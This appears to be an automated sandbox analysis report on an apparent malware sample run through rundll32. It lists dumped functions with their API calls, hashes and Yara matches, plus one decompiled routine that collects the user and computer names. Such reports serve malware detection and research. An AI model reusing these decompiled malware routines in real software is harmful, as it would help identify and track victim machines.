                                            • API ID: BuffersErrorFileFlushLastmemset
                                            • String ID: K$P
                                            • API String ID: 3817869962-420285281
                                            • Opcode ID: 86fbb2bf818de7c09e7f79c0cc7f6f5144dd66b3adc5b2650e844644ff220b60
                                            • Instruction ID: be3b496a1f006c23beca2aee445a2076f310345946e6fc7abfe471e30bcae737
                                            • Opcode Fuzzy Hash: 86fbb2bf818de7c09e7f79c0cc7f6f5144dd66b3adc5b2650e844644ff220b60
                                            • Instruction Fuzzy Hash: F7418F70A00705DFDB64CF74DD84A6EBBF2BF44614F54452DE886D3681D734A984CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580F868 Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.NTDLL(?,058038D5,00000000,?,?,?,058038D5,?,?,?,?,?), ref: 0580F8A6
                                            • lstrlen.KERNEL32(058038D5,?,?,?,058038D5,?,?,?,?,?), ref: 0580F8C4
                                            • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0580F933
                                            • lstrlen.KERNEL32(058038D5,00000000,00000000,?,?,?,058038D5,?,?,?,?,?), ref: 0580F954
                                            • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 0580F968
                                            • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0580F971
                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0580F97F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlenmemcpy$FreeLocal
                                            • String ID:
                                            • API String ID: 1123625124-0
                                            • Opcode ID: 36ed1c8b8d5997af37ee2ff563a518d00a7eb0c59bf36a8a2f6baee54e9fb134
                                            • Instruction ID: 808608512ec6902c306811abd35634a554e55a0c351fd801b4b709b12583c8ff
                                            • Opcode Fuzzy Hash: 36ed1c8b8d5997af37ee2ff563a518d00a7eb0c59bf36a8a2f6baee54e9fb134
                                            • Instruction Fuzzy Hash: 3D41147680521AAFDF21DF69DC4589B3FA9FF042A0B048425FD05A7250E731EE60CBE1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05818C96 Relevance: 7.7, APIs: 6, Instructions: 171stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05803AA7: ExpandEnvironmentStringsW.KERNEL32(73E806E0,00000000,00000000,73E806E0,?,80000001,05818CB5,?,73E806E0,0580407B,?,?,00000000,?), ref: 05803AB8
                                              • Part of subcall function 05803AA7: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,80000001,05818CB5,?,73E806E0,0580407B,?,?,00000000,?), ref: 05803AD5
                                            • lstrlenW.KERNEL32(?,00000000,?,80000001,?,73E806E0,0580407B,?,?,00000000,?), ref: 05818CE2
                                            • lstrlenW.KERNEL32(00000008,?,80000001,?,73E806E0,0580407B,?,?,00000000,?), ref: 05818CE9
                                            • lstrlenW.KERNEL32(?,?,?,80000001,?,73E806E0,0580407B,?,?,00000000,?), ref: 05818D07
                                            • lstrlen.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 05818DC5
                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 05818DD0
                                            • wsprintfA.USER32 ref: 05818E12
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 058034C6
                                              • Part of subcall function 05803486: GetLastError.KERNEL32 ref: 058034D0
                                              • Part of subcall function 05803486: WaitForSingleObject.KERNEL32(000000C8), ref: 058034F5
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 05803518
                                              • Part of subcall function 05803486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 05803540
                                              • Part of subcall function 05803486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 05803555
                                              • Part of subcall function 05803486: SetEndOfFile.KERNEL32(?), ref: 05803562
                                              • Part of subcall function 05803486: CloseHandle.KERNEL32(?), ref: 0580357A
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                                            • String ID:
                                            • API String ID: 1727939831-0
                                            • Opcode ID: d5bc647cee192e607b6471f3d4a5fe1b8ec3a53609ee4ccb407143a45d002366
                                            • Instruction ID: b08465ad18f96f3984caa2eb00fbb9dc403e2d162be6e0d38c186e6292a60ee0
                                            • Opcode Fuzzy Hash: d5bc647cee192e607b6471f3d4a5fe1b8ec3a53609ee4ccb407143a45d002366
                                            • Instruction Fuzzy Hash: 265138B2A0020AAFDF11AFA9CC499AE7FBABF48214B048025FD14E7250DB35ED519F55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580FEA8 Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,0581F51A,00000000,00000000), ref: 0580FEF9
                                            • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 0580FF8C
                                            • GetLastError.KERNEL32(?,?,0000011F), ref: 0580FFE4
                                            • GetLastError.KERNEL32 ref: 05810016
                                            • GetLastError.KERNEL32 ref: 0581002A
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0581F51A,00000000,00000000,?,0580D3E9,?), ref: 0581003F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$memcpy
                                            • String ID:
                                            • API String ID: 2760375183-0
                                            • Opcode ID: c6e3ffe32c10316de58aa5d12a8e696d18ad7d5cdee22f38bf5043b4104ee7bf
                                            • Instruction ID: eb53dec062a4634e91498279f724763c8b3f0a1f4983f745c6cad7a32e3233a9
                                            • Opcode Fuzzy Hash: c6e3ffe32c10316de58aa5d12a8e696d18ad7d5cdee22f38bf5043b4104ee7bf
                                            • Instruction Fuzzy Hash: EF512CB1900249EFDF20DFA4DC88AAE7FB9FB04350F008429FD15E6150D7709E949B65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581493E Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • lstrcpy.KERNEL32(?,00000020), ref: 05814A3B
                                            • lstrcat.KERNEL32(?,00000020), ref: 05814A50
                                            • lstrcmp.KERNEL32(00000000,?), ref: 05814A67
                                            • lstrlen.KERNEL32(?), ref: 05814A8B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                            • String ID:
                                            • API String ID: 3214092121-3916222277
                                            • Opcode ID: e2682f279393b7e99571cc7ae3909c97df3e7ab27b2f2e3e4390316906d2e06d
                                            • Instruction ID: 136362655bda40f1f0de0d071944f96ae923810e33a62f0201f723c9e3bb29a8
                                            • Opcode Fuzzy Hash: e2682f279393b7e99571cc7ae3909c97df3e7ab27b2f2e3e4390316906d2e06d
                                            • Instruction Fuzzy Hash: 3F51BF31B04218EBCF21CF99C484AADBBBAFF45315F15805AEC16DB221C770AE41CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058010EB Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen
                                            • String ID:
                                            • API String ID: 1659193697-0
                                            • Opcode ID: 5b3b8964864b46de1516e5c60e66718f7365077d3d827cf3e6eef50c0df7b8dc
                                            • Instruction ID: bb1f0f2a5735845368a86ea8659970303a625809d7960e929dbb755c50ff91e9
                                            • Opcode Fuzzy Hash: 5b3b8964864b46de1516e5c60e66718f7365077d3d827cf3e6eef50c0df7b8dc
                                            • Instruction Fuzzy Hash: 04412F75A0020AAFCB54EF99CC889AEB7FAFF98314B149929D915E3240D734ED44CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581B138 Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05820AD0: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 05820ADC
                                              • Part of subcall function 05820AD0: SetLastError.KERNEL32(000000B7,?,0581B14C), ref: 05820AED
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0581B16C
                                            • CloseHandle.KERNEL32(00000000), ref: 0581B244
                                              • Part of subcall function 058047FF: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05804819
                                              • Part of subcall function 058047FF: CreateWaitableTimerA.KERNEL32(05829208,?,?), ref: 05804836
                                              • Part of subcall function 058047FF: GetLastError.KERNEL32(?,?), ref: 05804847
                                              • Part of subcall function 058047FF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 05804887
                                              • Part of subcall function 058047FF: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 058048A6
                                              • Part of subcall function 058047FF: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 058048BC
                                            • GetLastError.KERNEL32 ref: 0581B22D
                                            • ReleaseMutex.KERNEL32(00000000), ref: 0581B236
                                              • Part of subcall function 05820AD0: CreateMutexA.KERNEL32(05829208,00000000,?,?,0581B14C), ref: 05820B00
                                            • GetLastError.KERNEL32 ref: 0581B251
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                            • String ID:
                                            • API String ID: 1700416623-0
                                            • Opcode ID: de666324f16d1fcf476b196b6e82e18e6d3559f6f279039173a9556be1addce0
                                            • Instruction ID: ddce23ba3c45c8c949b37437f99c4661f5413fedcf604f641db02a35649a0b34
                                            • Opcode Fuzzy Hash: de666324f16d1fcf476b196b6e82e18e6d3559f6f279039173a9556be1addce0
                                            • Instruction Fuzzy Hash: 943182756102089FCB21AF78DC89DAE7FBAFB89301B248465FD17DB250DA319C44CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581B9A1 Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlImageNtHeader.NTDLL(00000000), ref: 0581B9BA
                                              • Part of subcall function 05803AEB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0581A192), ref: 05803B11
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,?,00000000,0581D73E,00000000), ref: 0581B9FC
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 0581BA4E
                                            • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,0581D73E,00000000), ref: 0581BA67
                                              • Part of subcall function 05806706: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05806727
                                              • Part of subcall function 05806706: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,00000000), ref: 0580676A
                                            • GetLastError.KERNEL32(?,00000000,0581D73E,00000000,?,?,?,?,?,?,?,0580BF69,?), ref: 0581BA9F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                            • String ID:
                                            • API String ID: 1921436656-0
                                            • Opcode ID: 5b644bfa912d10bdbbad2789ccf2be75eaf937971b1edf2d0da959f846b12e82
                                            • Instruction ID: c37608c4aac0358f260f556ecd63854f2cfce699d8dbb2940ff416a3284df656
                                            • Opcode Fuzzy Hash: 5b644bfa912d10bdbbad2789ccf2be75eaf937971b1edf2d0da959f846b12e82
                                            • Instruction Fuzzy Hash: 13313A71B01209AFDF61DFA9D885AAE7FBAFB04251F004065FD16E7251DB30AE40CB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05808D50 Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 05808DD2
                                            • lstrcpy.KERNEL32(00000000,?), ref: 05808DEB
                                            • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 05808DF8
                                            • lstrlen.KERNEL32(0582A3A8,?,?,?,?,?,00000000,00000000,?), ref: 05808E0A
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 05808E3B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                            • String ID:
                                            • API String ID: 2734445380-0
                                            • Opcode ID: 577e3b78b5c5c79513b6d01695c21b5cdf4747fc94e95be7e57a711a057f86f5
                                            • Instruction ID: de26e2607a5c6bc0cccc2edb63bcdf827bd0327f614f60b233b617dabc007568
                                            • Opcode Fuzzy Hash: 577e3b78b5c5c79513b6d01695c21b5cdf4747fc94e95be7e57a711a057f86f5
                                            • Instruction Fuzzy Hash: 80313972500219AFDB61DF99DC89EEA7FA9EF44220F008514FD1992250DB74AA95CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580275C Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581ACA0: RtlEnterCriticalSection.NTDLL(05829448), ref: 0581ACA8
                                              • Part of subcall function 0581ACA0: RtlLeaveCriticalSection.NTDLL(05829448), ref: 0581ACBD
                                              • Part of subcall function 0581ACA0: InterlockedIncrement.KERNEL32(0000001C), ref: 0581ACD6
                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05802793
                                            • memcpy.NTDLL(00000000,?,?), ref: 058027A4
                                            • lstrcmpi.KERNEL32(00000002,?), ref: 058027EA
                                            • memcpy.NTDLL(00000000,?,?), ref: 058027FE
                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 05802844
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                            • String ID:
                                            • API String ID: 733514052-0
                                            • Opcode ID: 678f3bf01e109c26768584c05ecbe7ef7a874d593b6b374a1498fa8f3608512e
                                            • Instruction ID: 234b87c49c6fc0c7b64c59f9c793b50ba068fa9ef3549366e85da8bdba85dde2
                                            • Opcode Fuzzy Hash: 678f3bf01e109c26768584c05ecbe7ef7a874d593b6b374a1498fa8f3608512e
                                            • Instruction Fuzzy Hash: 0131B476A00208BFDB21AFA8DCCDAAE3FB9FB04254F145029FD06D3250D7759D848B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F3268 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F3268() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E049F4DF6(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E049F4C73(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t56 + 2, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                            0x049f3276
                                            0x049f3279
                                            0x049f327c
                                            0x049f3282
                                            0x049f3287
                                            0x049f328d
                                            0x049f3295
                                            0x049f3298
                                            0x049f329e
                                            0x049f32a3
                                            0x049f32b0
                                            0x049f32bd
                                            0x049f32c1
                                            0x049f32c3
                                            0x049f32c7
                                            0x049f32ca
                                            0x049f32da
                                            0x049f332d
                                            0x049f332e
                                            0x049f32dc
                                            0x049f32e1
                                            0x049f32e2
                                            0x049f32e7
                                            0x049f32ea
                                            0x049f32fd
                                            0x00000000
                                            0x049f32ff
                                            0x049f3302
                                            0x049f3315
                                            0x049f3318
                                            0x049f331e
                                            0x049f3323
                                            0x00000000
                                            0x049f3325
                                            0x049f3325
                                            0x049f3328
                                            0x049f3328
                                            0x049f3323
                                            0x049f32fd
                                            0x049f3333
                                            0x049f3334
                                            0x049f32a3
                                            0x049f333a

                                            APIs
                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 049F327C
                                            • GetComputerNameW.KERNEL32(00000000,?), ref: 049F3298
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 049F32D2
                                            • GetComputerNameW.KERNEL32(?,?), ref: 049F32F5
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,?,00000000,00000000), ref: 049F3318
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                            • String ID:
                                            • API String ID: 3850880919-0
                                            • Opcode ID: 0c17c1e4a3eb9facc0f316877800d0665f230253ee79d4ced200da5b5af82faf
                                            • Instruction ID: 1221701f76125864f58e232cffd8f854bbd8141d09f9fd10a0b49db90d54cf6d
                                            • Opcode Fuzzy Hash: 0c17c1e4a3eb9facc0f316877800d0665f230253ee79d4ced200da5b5af82faf
                                            • Instruction Fuzzy Hash: 2B210AB6900109FFDB11DFE9D9849EEBBBCEF44300B5444AAEA01E7240DB34AB04DB20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05821524 Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581C9C0: lstrlen.KERNEL32(00000000,00000000,?,00000000,05821538,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0581C9CC
                                            • RtlEnterCriticalSection.NTDLL(05829448), ref: 0582154E
                                            • RtlLeaveCriticalSection.NTDLL(05829448), ref: 05821561
                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05821572
                                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 058215DD
                                            • InterlockedIncrement.KERNEL32(0582945C), ref: 058215F4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                            • String ID:
                                            • API String ID: 3915436794-0
                                            • Opcode ID: d4ee10bd53e1498f879107940de896ae3edb6ba30e185317a0c3a05ececa3593
                                            • Instruction ID: 89ef0c9ecb81ebc79a092f5b6a4eef3761f0761d9c8761ab2784bd2064155292
                                            • Opcode Fuzzy Hash: d4ee10bd53e1498f879107940de896ae3edb6ba30e185317a0c3a05ececa3593
                                            • Instruction Fuzzy Hash: D7318B32A046259FCB208F68D84992ABFA9FB44725F158519FD56C3250DB30EC95CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05815E28 Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(?,?,00000000,00000000,0581601E,00000000,76CDF5B0,0581339A,?,00000001), ref: 05815E48
                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05815E5D
                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05815E79
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05815E8E
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05815EA2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad$AddressProc
                                            • String ID:
                                            • API String ID: 1469910268-0
                                            • Opcode ID: 2fb974561ef9a9ba981731817d87dd7a04d14ab1348b4d612cdc8b8703c9d14b
                                            • Instruction ID: 9bcffaf95702a49fd5776080b42b6126b847aca38afda335c0ec05603e7dcf3a
                                            • Opcode Fuzzy Hash: 2fb974561ef9a9ba981731817d87dd7a04d14ab1348b4d612cdc8b8703c9d14b
                                            • Instruction Fuzzy Hash: 7D312B72A202109FDB20EB5AE88AE513FE9FB49320F058056FD48D7350DB78BD818F58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580E229 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetUserNameW.ADVAPI32(00000000,0580AB98), ref: 0580E23D
                                            • GetComputerNameW.KERNEL32(00000000,0580AB98), ref: 0580E259
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • GetUserNameW.ADVAPI32(75BCC740,0580AB98), ref: 0580E293
                                            • GetComputerNameW.KERNEL32(0580AB98,?), ref: 0580E2B6
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,75BCC740,0580AB98,00000000,0580AB9A,00000000,00000000,?,?,0580AB98), ref: 0580E2D9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                            • String ID:
                                            • API String ID: 3850880919-0
                                            • Opcode ID: b10a5924ce0ca2fbb62e9bf076ff023f37c3acf936459e6da64e46485ea4505e
                                            • Instruction ID: 3b9216b4880a690e409a010fe418427acf34ab715ad0178bd9f0e027ce09afec
                                            • Opcode Fuzzy Hash: b10a5924ce0ca2fbb62e9bf076ff023f37c3acf936459e6da64e46485ea4505e
                                            • Instruction Fuzzy Hash: 7F21BA76900218FFDB21DFE9D9858AEBBBCEF44244B50446AE906E7244DA30AF44DB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581105E Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                            • DeleteFileA.KERNEL32(00000000,000004D2), ref: 05811081
                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0581108A
                                            • GetLastError.KERNEL32 ref: 05811094
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05811153
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                            • String ID:
                                            • API String ID: 3543646443-0
                                            • Opcode ID: 8456ef453015fbe9a40be0e9788351b4a48fd90462fbf4fff5cd793026917ca7
                                            • Instruction ID: 74cd0fa9f366389cbadff9e08051d7bbb9f2b9abba116d839b2a94c52d122c03
                                            • Opcode Fuzzy Hash: 8456ef453015fbe9a40be0e9788351b4a48fd90462fbf4fff5cd793026917ca7
                                            • Instruction Fuzzy Hash: F12191B2711210BBDA60BBE6EC5DE8A3F9CEB56261B059121FF06C7150DA24AD40C7A6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05806434 Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 058039E2: GetSystemTimeAsFileTime.KERNEL32(?), ref: 058039EE
                                              • Part of subcall function 058039E2: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 05803A04
                                              • Part of subcall function 058039E2: _snwprintf.NTDLL ref: 05803A29
                                              • Part of subcall function 058039E2: CreateFileMappingW.KERNEL32(000000FF,05829208,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 05803A45
                                              • Part of subcall function 058039E2: GetLastError.KERNEL32 ref: 05803A57
                                              • Part of subcall function 058039E2: CloseHandle.KERNEL32(00000000), ref: 05803A8F
                                            • UnmapViewOfFile.KERNEL32(?), ref: 0580646F
                                            • CloseHandle.KERNEL32(?), ref: 05806478
